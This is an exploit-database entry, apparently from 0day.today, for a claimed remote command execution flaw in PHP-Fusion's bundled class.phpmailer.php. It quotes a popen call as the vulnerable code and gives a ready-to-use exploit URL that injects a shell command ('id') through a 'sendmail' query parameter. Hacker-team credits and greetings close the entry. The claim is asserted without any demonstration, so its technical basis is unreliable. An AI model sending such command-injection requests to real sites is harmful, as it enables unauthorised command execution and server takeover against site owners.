PHP-Fusion Remote Command Execution Vulnerability

2010-07-18T00:00:00
ID 1337DAY-ID-13392
Type zdt
Reporter ViRuS Qalaa
Modified 2010-07-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================
PHP-Fusion Remote Command Execution Vulnerability
=================================================


# Exploit Title:   PHP-Fusion Remote Command Execution Vulnerability
# Date: 2010/07/19
# Author: ViRuS Qalaa
# Email: [email protected]
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================
 
-=[ vuln c0de ]=-
popen($sendmail, 'w'))
/includes/class.phpmailer.php
Line:438
 
----exploit----
 
http://{localhost}/{path}/includes/class.phpmailer.php?sendmail=id
 
---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,Spy-iq
 
and My friends Others and My friends in MSN
EnJoY o_O



#  0day.today [2018-02-06]  #